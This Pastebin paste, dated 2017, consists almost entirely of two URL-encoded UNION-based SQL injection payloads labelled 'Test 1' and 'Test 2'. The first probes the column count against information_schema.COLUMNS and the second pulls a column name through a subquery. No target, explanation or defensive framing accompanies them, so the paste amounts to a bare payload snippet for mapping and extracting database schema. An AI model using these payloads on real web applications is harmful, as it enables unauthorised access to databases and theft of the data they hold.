Valenzelektron

SQL

Sep 26th, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 0.18 KB | None | 0 0
  1. /*
  2. *System.in
  3. */
  4.  
  5. Test 1: UNION+SELECT+1,2,3,4,5,6,7+FROM+information_schema.COLUMNS
  6. Test 2: UNION+SELECT+1,2,(SELECT+column_name+FROM+information_schema.COLUMNS+LIMIT+1),4,5,6
Advertisement
Add Comment
Please, Sign In to add comment